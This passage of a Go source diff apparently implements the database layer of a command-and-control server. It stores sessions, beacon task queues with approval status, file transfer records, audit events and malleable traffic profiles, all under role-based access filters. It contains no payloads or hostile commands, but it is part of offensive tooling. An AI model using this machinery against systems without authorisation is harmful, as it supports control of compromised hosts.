ra.resource_type = 'c2_listener' AND ra.resource_id = c2_sessions.listener_id + )`) + *args = append(*args, access.UserID) + } + *conditions = append(*conditions, "("+strings.Join(clauses, " OR ")+")") +} + +// DeleteC2Session 级联删除其 tasks/files +func (db *DB) DeleteC2Session(id string) error { + res, err := db.Exec(`DELETE FROM c2_sessions WHERE id = ?`, id) + if err != nil { + return err + } + affected, _ := res.RowsAffected() + if affected == 0 { + return sql.ErrNoRows + } + return nil +} + +// DeleteC2SessionsByIDs 按主键批量删除会话 +func (db *DB) DeleteC2SessionsByIDs(ids []string) (int64, error) { + if len(ids) == 0 { + return 0, nil + } + const maxBatch = 500 + if len(ids) > maxBatch { + ids = ids[:maxBatch] + } + clean := make([]string, 0, len(ids)) + seen := make(map[string]struct{}, len(ids)) + for _, id := range ids { + id = strings.TrimSpace(id) + if !validC2TextIDForDelete(id) { + continue + } + if _, ok := seen[id]; ok { + continue + } + seen[id] = struct{}{} + clean = append(clean, id) + } + if len(clean) == 0 { + return 0, ErrNoValidC2SessionIDs + } + placeholders := strings.Repeat("?,", len(clean)-1) + "?" + args := make([]interface{}, len(clean)) + for i := range clean { + args[i] = clean[i] + } + query := `DELETE FROM c2_sessions WHERE id IN (` + placeholders + `)` + res, err := db.Exec(query, args...) + if err != nil { + return 0, err + } + return res.RowsAffected() +} + +func (db *DB) DeleteC2SessionsByIDsForAccess(ids []string, access RBACListAccess) (int64, error) { + if access.Scope == RBACScopeAll { + return db.DeleteC2SessionsByIDs(ids) + } + clean := cleanC2IDs(ids) + if len(clean) == 0 { + return 0, ErrNoValidC2SessionIDs + } + placeholders := strings.Repeat("?,", len(clean)-1) + "?" + args := make([]interface{}, 0, len(clean)+2) + for _, id := range clean { + args = append(args, id) + } + conditions := []string{"id IN (" + placeholders + ")"} + appendC2SessionAccessFilter(&conditions, &args, access) + query := `DELETE FROM c2_sessions WHERE ` + strings.Join(conditions, " AND ") + res, err := db.Exec(query, args...) + if err != nil { + return 0, err + } + return res.RowsAffected() +} + +// ---------------------------------------------------------------------------- +// CRUD:C2 任务 +// ---------------------------------------------------------------------------- + +// CreateC2Task 入队一个新任务 +func (db *DB) CreateC2Task(t *C2Task) error { + if t == nil || strings.TrimSpace(t.ID) == "" { + return errors.New("task id is required") + } + if t.CreatedAt.IsZero() { + t.CreatedAt = time.Now() + } + if strings.TrimSpace(t.Status) == "" { + t.Status = "queued" + } + if strings.TrimSpace(t.Source) == "" { + t.Source = "manual" + } + payloadJSON := "{}" + if len(t.Payload) > 0 { + if b, err := json.Marshal(t.Payload); err == nil { + payloadJSON = string(b) + } + } + query := ` + INSERT INTO c2_tasks (id, session_id, task_type, payload_json, status, + result_text, result_blob_path, error, source, conversation_id, approval_status, + created_at, sent_at, started_at, completed_at, duration_ms) + VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?) + ` + _, err := db.Exec(query, + t.ID, t.SessionID, t.TaskType, payloadJSON, t.Status, + t.ResultText, t.ResultBlobPath, t.Error, t.Source, t.ConversationID, t.ApprovalStatus, + t.CreatedAt, t.SentAt, t.StartedAt, t.CompletedAt, t.DurationMS, + ) + if err != nil { + db.logger.Error("创建 C2 任务失败", zap.Error(err), zap.String("id", t.ID)) + return err + } + return nil +} + +// SetC2TaskStatus 更新任务的状态/结果/错误/时间戳 +type C2TaskUpdate struct { + Status *string + ResultText *string + ResultBlobPath *string + Error *string + ApprovalStatus *string + SentAt *time.Time + StartedAt *time.Time + CompletedAt *time.Time + DurationMS *int64 +} + +// UpdateC2Task 增量更新任务字段;nil 字段保持原值 +func (db *DB) UpdateC2Task(id string, u C2TaskUpdate) error { + sets := []string{} + args := []interface{}{} + if u.Status != nil { + sets = append(sets, "status = ?") + args = append(args, *u.Status) + } + if u.ResultText != nil { + sets = append(sets, "result_text = ?") + args = append(args, *u.ResultText) + } + if u.ResultBlobPath != nil { + sets = append(sets, "result_blob_path = ?") + args = append(args, *u.ResultBlobPath) + } + if u.Error != nil { + sets = append(sets, "error = ?") + args = append(args, *u.Error) + } + if u.ApprovalStatus != nil { + sets = append(sets, "approval_status = ?") + args = append(args, *u.ApprovalStatus) + } + if u.SentAt != nil { + sets = append(sets, "sent_at = ?") + args = append(args, *u.SentAt) + } + if u.StartedAt != nil { + sets = append(sets, "started_at = ?") + args = append(args, *u.StartedAt) + } + if u.CompletedAt != nil { + sets = append(sets, "completed_at = ?") + args = append(args, *u.CompletedAt) + } + if u.DurationMS != nil { + sets = append(sets, "duration_ms = ?") + args = append(args, *u.DurationMS) + } + if len(sets) == 0 { + return nil + } + query := "UPDATE c2_tasks SET " + strings.Join(sets, ", ") + " WHERE id = ?" + args = append(args, id) + res, err := db.Exec(query, args...) + if err != nil { + return err + } + affected, _ := res.RowsAffected() + if affected == 0 { + return sql.ErrNoRows + } + return nil +} + +// GetC2Task 单条 +func (db *DB) GetC2Task(id string) (*C2Task, error) { + query := ` + SELECT id, session_id, task_type, COALESCE(payload_json, '{}'), + status, COALESCE(result_text, ''), COALESCE(result_blob_path, ''), + COALESCE(error, ''), COALESCE(source, 'manual'), + COALESCE(conversation_id, ''), COALESCE(approval_status, ''), + created_at, sent_at, started_at, completed_at, COALESCE(duration_ms, 0) + FROM c2_tasks WHERE id = ? + ` + var t C2Task + var payloadJSON string + var sentAt, startedAt, completedAt sql.NullTime + err := db.QueryRow(query, id).Scan( + &t.ID, &t.SessionID, &t.TaskType, &payloadJSON, + &t.Status, &t.ResultText, &t.ResultBlobPath, + &t.Error, &t.Source, + &t.ConversationID, &t.ApprovalStatus, + &t.CreatedAt, &sentAt, &startedAt, &completedAt, &t.DurationMS, + ) + if err == sql.ErrNoRows { + return nil, nil + } + if err != nil { + return nil, err + } + if payloadJSON != "" && payloadJSON != "{}" { + _ = json.Unmarshal([]byte(payloadJSON), &t.Payload) + } + if sentAt.Valid { + x := sentAt.Time + t.SentAt = &x + } + if startedAt.Valid { + x := startedAt.Time + t.StartedAt = &x + } + if completedAt.Valid { + x := completedAt.Time + t.CompletedAt = &x + } + return &t, nil +} + +// ListC2TasksFilter 任务过滤 +type ListC2TasksFilter struct { + SessionID string + ProjectID string + Status string + TaskType string + Since *time.Time + Limit int + Offset int +} + +func buildC2TasksWhere(filter ListC2TasksFilter) (where string, args []interface{}) { + conditions := []string{"1=1"} + args = []interface{}{} + if filter.SessionID != "" { + conditions = append(conditions, "session_id = ?") + args = append(args, filter.SessionID) + } + if strings.TrimSpace(filter.ProjectID) == ProjectFilterUnbound { + conditions = append(conditions, `EXISTS ( + SELECT 1 FROM c2_sessions s + JOIN c2_listeners l ON l.id = s.listener_id + WHERE s.id = c2_tasks.session_id AND COALESCE(l.project_id, '') = '' + )`) + } else if strings.TrimSpace(filter.ProjectID) != "" { + conditions = append(conditions, `EXISTS ( + SELECT 1 FROM c2_sessions s + JOIN c2_listeners l ON l.id = s.listener_id + WHERE s.id = c2_tasks.session_id AND COALESCE(l.project_id, '') = ? + )`) + args = append(args, strings.TrimSpace(filter.ProjectID)) + } + if filter.Status != "" { + conditions = append(conditions, "status = ?") + args = append(args, filter.Status) + } + if strings.TrimSpace(filter.TaskType) != "" { + conditions = append(conditions, "task_type = ?") + args = append(args, strings.TrimSpace(filter.TaskType)) + } + if filter.Since != nil { + conditions = append(conditions, sqliteEpochGE("created_at", ">=")) + args = append(args, formatSQLiteUTC(*filter.Since)) + } + return strings.Join(conditions, " AND "), args +} + +func appendC2TaskAccessFilter(conditions *[]string, args *[]interface{}, access RBACListAccess) { + if access.Scope == RBACScopeAll { + return + } + if access.UserID == "" { + *conditions = append(*conditions, "1=0") + return + } + clauses := []string{`EXISTS ( + SELECT 1 FROM c2_sessions s + JOIN c2_listeners l ON l.id = s.listener_id + WHERE s.id = c2_tasks.session_id AND l.owner_user_id = ? + )`} + *args = append(*args, access.UserID) + if access.Scope == RBACScopeAssigned { + clauses = append(clauses, `EXISTS ( + SELECT 1 FROM c2_sessions s + JOIN rbac_resource_assignments ra ON ra.resource_id = s.listener_id + WHERE s.id = c2_tasks.session_id + AND ra.user_id = ? AND ra.resource_type = 'c2_listener' + )`) + *args = append(*args, access.UserID) + } + *conditions = append(*conditions, "("+strings.Join(clauses, " OR ")+")") +} + +func buildC2TasksWhereForAccess(filter ListC2TasksFilter, access RBACListAccess) (string, []interface{}) { + where, args := buildC2TasksWhere(filter) + conditions := []string{where} + appendC2TaskAccessFilter(&conditions, &args, access) + return strings.Join(conditions, " AND "), args +} + +// CountC2Tasks 与 ListC2Tasks 相同过滤条件下的记录总数 +func (db *DB) CountC2Tasks(filter ListC2TasksFilter) (int64, error) { + where, args := buildC2TasksWhere(filter) + query := `SELECT COUNT(*) FROM c2_tasks WHERE ` + where + var n int64 + err := db.QueryRow(query, args...).Scan(&n) + return n, err +} + +func (db *DB) CountC2TasksForAccess(filter ListC2TasksFilter, access RBACListAccess) (int64, error) { + where, args := buildC2TasksWhereForAccess(filter, access) + query := `SELECT COUNT(*) FROM c2_tasks WHERE ` + where + var n int64 + err := db.QueryRow(query, args...).Scan(&n) + return n, err +} + +// CountC2TasksByStatusForAccess 与 ListC2Tasks 相同过滤条件下按状态统计 +func (db *DB) CountC2TasksByStatusForAccess(filter ListC2TasksFilter, access RBACListAccess) (map[string]int64, error) { + where, args := buildC2TasksWhereForAccess(filter, access) + query := `SELECT status, COUNT(*) FROM c2_tasks WHERE ` + where + ` GROUP BY status` + rows, err := db.Query(query, args...) + if err != nil { + return nil, err + } + defer rows.Close() + counts := map[string]int64{ + "queued": 0, + "sent": 0, + "running": 0, + "success": 0, + "failed": 0, + "cancelled": 0, + "pending": 0, + } + var legacyPending int64 + for rows.Next() { + var status string + var n int64 + if err := rows.Scan(&status, &n); err != nil { + continue + } + if status == "pending" { + legacyPending = n + continue + } + if _, ok := counts[status]; ok { + counts[status] = n + } + } + counts["pending"] = counts["queued"] + counts["sent"] + counts["running"] + legacyPending + return counts, rows.Err() +} + +// CountC2TasksQueuedOrPending 统计 queued/pending 状态任务数(仪表盘「待审任务」) +func (db *DB) CountC2TasksQueuedOrPending(sessionID string) (int64, error) { + conditions := []string{"status IN ('queued', 'pending')"} + args := []interface{}{} + if sessionID != "" { + conditions = append(conditions, "session_id = ?") + args = append(args, sessionID) + } + query := `SELECT COUNT(*) FROM c2_tasks WHERE ` + strings.Join(conditions, " AND ") + var n int64 + err := db.QueryRow(query, args...).Scan(&n) + return n, err +} + +func (db *DB) CountC2TasksQueuedOrPendingForAccess(sessionID, projectID string, access RBACListAccess) (int64, error) { + filter := ListC2TasksFilter{SessionID: sessionID, ProjectID: projectID} + where, args := buildC2TasksWhereForAccess(filter, access) + query := `SELECT COUNT(*) FROM c2_tasks WHERE status IN ('queued', 'pending') AND ` + where + var n int64 + err := db.QueryRow(query, args...).Scan(&n) + return n, err +} + +// ListC2Tasks 任务列表,按创建时间倒序 +func (db *DB) ListC2Tasks(filter ListC2TasksFilter) ([]*C2Task, error) { + where, args := buildC2TasksWhere(filter) + query := ` + SELECT id, session_id, task_type, COALESCE(payload_json, '{}'), + status, COALESCE(result_text, ''), COALESCE(result_blob_path, ''), + COALESCE(error, ''), COALESCE(source, 'manual'), + COALESCE(conversation_id, ''), COALESCE(approval_status, ''), + created_at, sent_at, started_at, completed_at, COALESCE(duration_ms, 0) + FROM c2_tasks + WHERE ` + where + ` + ORDER BY created_at DESC + ` + limit := filter.Limit + offset := filter.Offset + if offset < 0 { + offset = 0 + } + if limit > 0 { + if limit > 1000 { + limit = 1000 + } + query += ` LIMIT ? OFFSET ?` + args = append(args, limit, offset) + } + rows, err := db.Query(query, args...) + if err != nil { + return nil, err + } + defer rows.Close() + var list []*C2Task + for rows.Next() { + var t C2Task + var payloadJSON string + var sentAt, startedAt, completedAt sql.NullTime + if err := rows.Scan( + &t.ID, &t.SessionID, &t.TaskType, &payloadJSON, + &t.Status, &t.ResultText, &t.ResultBlobPath, + &t.Error, &t.Source, + &t.ConversationID, &t.ApprovalStatus, + &t.CreatedAt, &sentAt, &startedAt, &completedAt, &t.DurationMS, + ); err != nil { + db.logger.Warn("扫描 c2_tasks 行失败", zap.Error(err)) + continue + } + if payloadJSON != "" && payloadJSON != "{}" { + _ = json.Unmarshal([]byte(payloadJSON), &t.Payload) + } + if sentAt.Valid { + x := sentAt.Time + t.SentAt = &x + } + if startedAt.Valid { + x := startedAt.Time + t.StartedAt = &x + } + if completedAt.Valid { + x := completedAt.Time + t.CompletedAt = &x + } + list = append(list, &t) + } + return list, rows.Err() +} + +func (db *DB) ListC2TasksForAccess(filter ListC2TasksFilter, access RBACListAccess) ([]*C2Task, error) { + where, args := buildC2TasksWhereForAccess(filter, access) + query := ` + SELECT id, session_id, task_type, COALESCE(payload_json, '{}'), + status, COALESCE(result_text, ''), COALESCE(result_blob_path, ''), + COALESCE(error, ''), COALESCE(source, 'manual'), + COALESCE(conversation_id, ''), COALESCE(approval_status, ''), + created_at, sent_at, started_at, completed_at, COALESCE(duration_ms, 0) + FROM c2_tasks + WHERE ` + where + ` + ORDER BY created_at DESC + ` + limit := filter.Limit + offset := filter.Offset + if offset < 0 { + offset = 0 + } + if limit > 0 { + if limit > 1000 { + limit = 1000 + } + query += ` LIMIT ? OFFSET ?` + args = append(args, limit, offset) + } + rows, err := db.Query(query, args...) + if err != nil { + return nil, err + } + defer rows.Close() + return db.scanC2TaskRows(rows) +} + +func (db *DB) scanC2TaskRows(rows *sql.Rows) ([]*C2Task, error) { + var list []*C2Task + for rows.Next() { + var t C2Task + var payloadJSON string + var sentAt, startedAt, completedAt sql.NullTime + if err := rows.Scan( + &t.ID, &t.SessionID, &t.TaskType, &payloadJSON, + &t.Status, &t.ResultText, &t.ResultBlobPath, + &t.Error, &t.Source, + &t.ConversationID, &t.ApprovalStatus, + &t.CreatedAt, &sentAt, &startedAt, &completedAt, &t.DurationMS, + ); err != nil { + db.logger.Warn("扫描 c2_tasks 行失败", zap.Error(err)) + continue + } + if payloadJSON != "" && payloadJSON != "{}" { + _ = json.Unmarshal([]byte(payloadJSON), &t.Payload) + } + if sentAt.Valid { + x := sentAt.Time + t.SentAt = &x + } + if startedAt.Valid { + x := startedAt.Time + t.StartedAt = &x + } + if completedAt.Valid { + x := completedAt.Time + t.CompletedAt = &x + } + list = append(list, &t) + } + return list, rows.Err() +} + +// PopQueuedC2Tasks 取出某会话所有 queued/approved 任务(用于 beacon 拉取),原子置为 sent +func (db *DB) PopQueuedC2Tasks(sessionID string, limit int) ([]*C2Task, error) { + if limit <= 0 { + limit = 50 + } + tx, err := db.Begin() + if err != nil { + return nil, err + } + committed := false + defer func() { + if !committed { + _ = tx.Rollback() + } + }() + query := ` + SELECT id, session_id, task_type, COALESCE(payload_json, '{}'), + status, COALESCE(source, 'manual'), COALESCE(approval_status, ''), + created_at + FROM c2_tasks + WHERE session_id = ? AND (status = 'queued' AND (approval_status = '' OR approval_status = 'approved')) + ORDER BY created_at ASC, rowid ASC + LIMIT ? + ` + rows, err := tx.Query(query, sessionID, limit) + if err != nil { + return nil, err + } + var list []*C2Task + for rows.Next() { + var t C2Task + var payloadJSON string + if err := rows.Scan(&t.ID, &t.SessionID, &t.TaskType, &payloadJSON, + &t.Status, &t.Source, &t.ApprovalStatus, &t.CreatedAt); err != nil { + rows.Close() + return nil, err + } + if payloadJSON != "" && payloadJSON != "{}" { + _ = json.Unmarshal([]byte(payloadJSON), &t.Payload) + } + list = append(list, &t) + } + rows.Close() + + now := time.Now() + for _, t := range list { + if _, err := tx.Exec( + `UPDATE c2_tasks SET status = 'sent', sent_at = ? WHERE id = ?`, now, t.ID, + ); err != nil { + return nil, err + } + t.Status = "sent" + t.SentAt = &now + } + if err := tx.Commit(); err != nil { + return nil, err + } + committed = true + return list, nil +} + +// DeleteC2Task 删除任务(一般用于 cancel queued) +func (db *DB) DeleteC2Task(id string) error { + res, err := db.Exec(`DELETE FROM c2_tasks WHERE id = ?`, id) + if err != nil { + return err + } + affected, _ := res.RowsAffected() + if affected == 0 { + return sql.ErrNoRows + } + return nil +} + +// DeleteC2TasksByIDs 按主键批量删除任务 +func (db *DB) DeleteC2TasksByIDs(ids []string) (int64, error) { + if len(ids) == 0 { + return 0, nil + } + const maxBatch = 500 + if len(ids) > maxBatch { + ids = ids[:maxBatch] + } + clean := make([]string, 0, len(ids)) + seen := make(map[string]struct{}, len(ids)) + for _, id := range ids { + id = strings.TrimSpace(id) + if !validC2TextIDForDelete(id) { + continue + } + if _, ok := seen[id]; ok { + continue + } + seen[id] = struct{}{} + clean = append(clean, id) + } + if len(clean) == 0 { + return 0, ErrNoValidC2TaskIDs + } + placeholders := strings.Repeat("?,", len(clean)-1) + "?" + args := make([]interface{}, len(clean)) + for i := range clean { + args[i] = clean[i] + } + query := `DELETE FROM c2_tasks WHERE id IN (` + placeholders + `)` + res, err := db.Exec(query, args...) + if err != nil { + return 0, err + } + return res.RowsAffected() +} + +func (db *DB) DeleteC2TasksByIDsForAccess(ids []string, access RBACListAccess) (int64, error) { + if access.Scope == RBACScopeAll { + return db.DeleteC2TasksByIDs(ids) + } + clean := cleanC2IDs(ids) + if len(clean) == 0 { + return 0, ErrNoValidC2TaskIDs + } + placeholders := strings.Repeat("?,", len(clean)-1) + "?" + args := make([]interface{}, 0, len(clean)+2) + for _, id := range clean { + args = append(args, id) + } + conditions := []string{"id IN (" + placeholders + ")"} + appendC2TaskAccessFilter(&conditions, &args, access) + query := `DELETE FROM c2_tasks WHERE ` + strings.Join(conditions, " AND ") + res, err := db.Exec(query, args...) + if err != nil { + return 0, err + } + return res.RowsAffected() +} + +// ---------------------------------------------------------------------------- +// CRUD:C2 文件 +// ---------------------------------------------------------------------------- + +// CreateC2File 记录上传/下载凭证(实际文件落盘由调用方处理) +func (db *DB) CreateC2File(f *C2File) error { + if f == nil || strings.TrimSpace(f.ID) == "" { + return errors.New("file id is required") + } + if f.CreatedAt.IsZero() { + f.CreatedAt = time.Now() + } + query := ` + INSERT INTO c2_files (id, session_id, task_id, direction, remote_path, + local_path, size_bytes, sha256, created_at) + VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?) + ` + _, err := db.Exec(query, f.ID, f.SessionID, f.TaskID, f.Direction, + f.RemotePath, f.LocalPath, f.SizeBytes, f.SHA256, f.CreatedAt) + return err +} + +// ListC2FilesBySession 列出某会话下所有上传/下载凭证 +func (db *DB) ListC2FilesBySession(sessionID string) ([]*C2File, error) { + query := ` + SELECT id, session_id, COALESCE(task_id, ''), direction, remote_path, local_path, + COALESCE(size_bytes, 0), COALESCE(sha256, ''), created_at + FROM c2_files WHERE session_id = ? ORDER BY created_at DESC + ` + rows, err := db.Query(query, sessionID) + if err != nil { + return nil, err + } + defer rows.Close() + var list []*C2File + for rows.Next() { + var f C2File + if err := rows.Scan(&f.ID, &f.SessionID, &f.TaskID, &f.Direction, + &f.RemotePath, &f.LocalPath, &f.SizeBytes, &f.SHA256, &f.CreatedAt); err != nil { + continue + } + list = append(list, &f) + } + return list, rows.Err() +} + +func cleanC2IDs(ids []string) []string { + const maxBatch = 500 + if len(ids) > maxBatch { + ids = ids[:maxBatch] + } + clean := make([]string, 0, len(ids)) + seen := make(map[string]struct{}, len(ids)) + for _, id := range ids { + id = strings.TrimSpace(id) + if !validC2TextIDForDelete(id) { + continue + } + if _, ok := seen[id]; ok { + continue + } + seen[id] = struct{}{} + clean = append(clean, id) + } + return clean +} + +// ---------------------------------------------------------------------------- +// CRUD:C2 事件审计 +// ---------------------------------------------------------------------------- + +// AppendC2Event 写一条审计事件 +func (db *DB) AppendC2Event(e *C2Event) error { + if e == nil { + return errors.New("event is nil") + } + if strings.TrimSpace(e.ID) == "" { + return errors.New("event id is required") + } + if e.CreatedAt.IsZero() { + e.CreatedAt = time.Now().UTC() + } else { + e.CreatedAt = e.CreatedAt.UTC() + } + if strings.TrimSpace(e.Level) == "" { + e.Level = "info" + } + dataJSON := "" + if len(e.Data) > 0 { + if b, err := json.Marshal(e.Data); err == nil { + dataJSON = string(b) + } + } + query := ` + INSERT INTO c2_events (id, level, category, session_id, task_id, message, data_json, created_at) + VALUES (?, ?, ?, ?, ?, ?, ?, ?) + ` + _, err := db.Exec(query, e.ID, e.Level, e.Category, e.SessionID, e.TaskID, e.Message, dataJSON, formatSQLiteUTC(e.CreatedAt)) + return err +} + +// ListC2EventsFilter 事件查询参数 +type ListC2EventsFilter struct { + Level string + Category string + ProjectID string + SessionID string + TaskID string + Since *time.Time + Limit int + Offset int +} + +func buildC2EventsWhere(filter ListC2EventsFilter) (where string, args []interface{}) { + conditions := []string{"1=1"} + args = []interface{}{} + if filter.Level != "" { + conditions = append(conditions, "level = ?") + args = append(args, filter.Level) + } + if filter.Category != "" { + conditions = append(conditions, "category = ?") + args = append(args, filter.Category) + } + if strings.TrimSpace(filter.ProjectID) == ProjectFilterUnbound { + conditions = append(conditions, `( + EXISTS ( + SELECT 1 FROM c2_sessions s + JOIN c2_listeners l ON l.id = s.listener_id + WHERE s.id = c2_events.session_id AND COALESCE(l.project_id, '') = '' + ) + OR EXISTS ( + SELECT 1 FROM c2_tasks t + JOIN c2_sessions s ON s.id = t.session_id + JOIN c2_listeners l ON l.id = s.listener_id + WHERE t.id = c2_events.task_id AND COALESCE(l.project_id, '') = '' + ) + OR EXISTS ( + SELECT 1 FROM c2_listeners l + WHERE json_valid(c2_events.data_json) + AND l.id = json_extract(c2_events.data_json, '$.listener_id') + AND COALESCE(l.project_id, '') = '' + ) + )`) + } else if strings.TrimSpace(filter.ProjectID) != "" { + conditions = append(conditions, `( + EXISTS ( + SELECT 1 FROM c2_sessions s + JOIN c2_listeners l ON l.id = s.listener_id + WHERE s.id = c2_events.session_id AND COALESCE(l.project_id, '') = ? + ) + OR EXISTS ( + SELECT 1 FROM c2_tasks t + JOIN c2_sessions s ON s.id = t.session_id + JOIN c2_listeners l ON l.id = s.listener_id + WHERE t.id = c2_events.task_id AND COALESCE(l.project_id, '') = ? + ) + OR EXISTS ( + SELECT 1 FROM c2_listeners l + WHERE json_valid(c2_events.data_json) + AND l.id = json_extract(c2_events.data_json, '$.listener_id') + AND COALESCE(l.project_id, '') = ? + ) + )`) + pid := strings.TrimSpace(filter.ProjectID) + args = append(args, pid, pid, pid) + } + if filter.SessionID != "" { + conditions = append(conditions, "session_id = ?") + args = append(args, filter.SessionID) + } + if filter.TaskID != "" { + conditions = append(conditions, "task_id = ?") + args = append(args, filter.TaskID) + } + if filter.Since != nil { + conditions = append(conditions, sqliteEpochGE("created_at", ">=")) + args = append(args, formatSQLiteUTC(*filter.Since)) + } + return strings.Join(conditions, " AND "), args +} + +func appendC2EventAccessFilter(conditions *[]string, args *[]interface{}, access RBACListAccess) { + if access.Scope == RBACScopeAll { + return + } + if access.UserID == "" { + *conditions = append(*conditions, "1=0") + return + } + clauses := []string{`EXISTS ( + SELECT 1 FROM c2_sessions s + JOIN c2_listeners l ON l.id = s.listener_id + WHERE s.id = c2_events.session_id AND l.owner_user_id = ? + )`} + *args = append(*args, access.UserID) + if access.Scope == RBACScopeAssigned { + clauses = append(clauses, `EXISTS ( + SELECT 1 FROM c2_sessions s + JOIN rbac_resource_assignments ra ON ra.resource_id = s.listener_id + WHERE s.id = c2_events.session_id + AND ra.user_id = ? AND ra.resource_type = 'c2_listener' + )`) + *args = append(*args, access.UserID) + } + clauses = append(clauses, `EXISTS ( + SELECT 1 FROM c2_tasks t + JOIN c2_sessions s ON s.id = t.session_id + JOIN c2_listeners l ON l.id = s.listener_id + WHERE t.id = c2_events.task_id AND l.owner_user_id = ? + )`) + *args = append(*args, access.UserID) + if access.Scope == RBACScopeAssigned { + clauses = append(clauses, `EXISTS ( + SELECT 1 FROM c2_tasks t + JOIN c2_sessions s ON s.id = t.session_id + JOIN rbac_resource_assignments ra ON ra.resource_id = s.listener_id + WHERE t.id = c2_events.task_id + AND ra.user_id = ? AND ra.resource_type = 'c2_listener' + )`) + *args = append(*args, access.UserID) + } + *conditions = append(*conditions, "("+strings.Join(clauses, " OR ")+")") +} + +func buildC2EventsWhereForAccess(filter ListC2EventsFilter, access RBACListAccess) (string, []interface{}) { + where, args := buildC2EventsWhere(filter) + conditions := []string{where} + appendC2EventAccessFilter(&conditions, &args, access) + return strings.Join(conditions, " AND "), args +} + +// CountC2Events 与 ListC2Events 相同过滤条件下的记录总数 +func (db *DB) CountC2Events(filter ListC2EventsFilter) (int64, error) { + where, args := buildC2EventsWhere(filter) + query := `SELECT COUNT(*) FROM c2_events WHERE ` + where + var n int64 + err := db.QueryRow(query, args...).Scan(&n) + return n, err +} + +func (db *DB) CountC2EventsForAccess(filter ListC2EventsFilter, access RBACListAccess) (int64, error) { + where, args := buildC2EventsWhereForAccess(filter, access) + query := `SELECT COUNT(*) FROM c2_events WHERE ` + where + var n int64 + err := db.QueryRow(query, args...).Scan(&n) + return n, err +} + +// CountC2EventsByLevelForAccess 与 ListC2Events 相同过滤条件下按级别统计 +func (db *DB) CountC2EventsByLevelForAccess(filter ListC2EventsFilter, access RBACListAccess) (map[string]int64, error) { + where, args := buildC2EventsWhereForAccess(filter, access) + query := `SELECT level, COUNT(*) FROM c2_events WHERE ` + where + ` GROUP BY level` + rows, err := db.Query(query, args...) + if err != nil { + return nil, err + } + defer rows.Close() + counts := map[string]int64{ + "info": 0, + "warn": 0, + "critical": 0, + } + for rows.Next() { + var level string + var n int64 + if err := rows.Scan(&level, &n); err != nil { + continue + } + if _, ok := counts[level]; ok { + counts[level] = n + } + } + return counts, rows.Err() +} + +// ListC2Events 事件查询,按创建时间倒序 +func (db *DB) ListC2Events(filter ListC2EventsFilter) ([]*C2Event, error) { + where, args := buildC2EventsWhere(filter) + limit := filter.Limit + if limit <= 0 || limit > 1000 { + limit = 200 + } + offset := filter.Offset + if offset < 0 { + offset = 0 + } + query := ` + SELECT id, level, category, COALESCE(session_id, ''), COALESCE(task_id, ''), + message, COALESCE(data_json, ''), created_at + FROM c2_events + WHERE ` + where + ` + ORDER BY created_at DESC + LIMIT ? OFFSET ? + ` + args = append(args, limit, offset) + rows, err := db.Query(query, args...) + if err != nil { + return nil, err + } + defer rows.Close() + var list []*C2Event + for rows.Next() { + var e C2Event + var dataJSON string + if err := rows.Scan(&e.ID, &e.Level, &e.Category, &e.SessionID, &e.TaskID, + &e.Message, &dataJSON, &e.CreatedAt); err != nil { + continue + } + if dataJSON != "" { + _ = json.Unmarshal([]byte(dataJSON), &e.Data) + } + list = append(list, &e) + } + return list, rows.Err() +} + +func (db *DB) ListC2EventsForAccess(filter ListC2EventsFilter, access RBACListAccess) ([]*C2Event, error) { + where, args := buildC2EventsWhereForAccess(filter, access) + limit := filter.Limit + if limit <= 0 || limit > 1000 { + limit = 200 + } + offset := filter.Offset + if offset < 0 { + offset = 0 + } + query := ` + SELECT id, level, category, COALESCE(session_id, ''), COALESCE(task_id, ''), + message, COALESCE(data_json, ''), created_at + FROM c2_events + WHERE ` + where + ` + ORDER BY created_at DESC + LIMIT ? OFFSET ? + ` + args = append(args, limit, offset) + rows, err := db.Query(query, args...) + if err != nil { + return nil, err + } + defer rows.Close() + return scanC2EventRows(rows) +} + +func scanC2EventRows(rows *sql.Rows) ([]*C2Event, error) { + var list []*C2Event + for rows.Next() { + var e C2Event + var dataJSON string + if err := rows.Scan(&e.ID, &e.Level, &e.Category, &e.SessionID, &e.TaskID, + &e.Message, &dataJSON, &e.CreatedAt); err != nil { + continue + } + if dataJSON != "" { + _ = json.Unmarshal([]byte(dataJSON), &e.Data) + } + list = append(list, &e) + } + return list, rows.Err() +} + +// DeleteC2EventsByIDs 按主键批量删除事件,返回实际删除行数 +func (db *DB) DeleteC2EventsByIDs(ids []string) (int64, error) { + if len(ids) == 0 { + return 0, nil + } + const maxBatch = 500 + if len(ids) > maxBatch { + ids = ids[:maxBatch] + } + clean := make([]string, 0, len(ids)) + seen := make(map[string]struct{}, len(ids)) + for _, id := range ids { + id = strings.TrimSpace(id) + if !validC2TextIDForDelete(id) { + continue + } + if _, ok := seen[id]; ok { + continue + } + seen[id] = struct{}{} + clean = append(clean, id) + } + if len(clean) == 0 { + return 0, ErrNoValidC2EventIDs + } + placeholders := strings.Repeat("?,", len(clean)-1) + "?" + args := make([]interface{}, len(clean)) + for i := range clean { + args[i] = clean[i] + } + query := `DELETE FROM c2_events WHERE id IN (` + placeholders + `)` + res, err := db.Exec(query, args...) + if err != nil { + return 0, err + } + return res.RowsAffected() +} + +func (db *DB) DeleteC2EventsByIDsForAccess(ids []string, access RBACListAccess) (int64, error) { + if access.Scope == RBACScopeAll { + return db.DeleteC2EventsByIDs(ids) + } + clean := cleanC2IDs(ids) + if len(clean) == 0 { + return 0, ErrNoValidC2EventIDs + } + placeholders := strings.Repeat("?,", len(clean)-1) + "?" + args := make([]interface{}, 0, len(clean)+4) + for _, id := range clean { + args = append(args, id) + } + conditions := []string{"id IN (" + placeholders + ")"} + appendC2EventAccessFilter(&conditions, &args, access) + query := `DELETE FROM c2_events WHERE ` + strings.Join(conditions, " AND ") + res, err := db.Exec(query, args...) + if err != nil { + return 0, err + } + return res.RowsAffected() +} + +// ---------------------------------------------------------------------------- +// CRUD:C2 Malleable Profile +// ---------------------------------------------------------------------------- + +// CreateC2Profile 创建/覆盖 Profile(按 name 唯一) +func (db *DB) CreateC2Profile(p *C2Profile) error { + if p == nil || strings.TrimSpace(p.ID) == "" { + return errors.New("profile id is required") + } + if p.CreatedAt.IsZero() { + p.CreatedAt = time.Now() + } + urisJSON, _ := json.Marshal(p.URIs) + reqHdrJSON, _ := json.Marshal(p.RequestHeaders) + resHdrJSON, _ := json.Marshal(p.ResponseHeaders) + query := ` + INSERT INTO c2_profiles (id, name, user_agent, uris_json, request_headers_json, + response_headers_json, body_template, 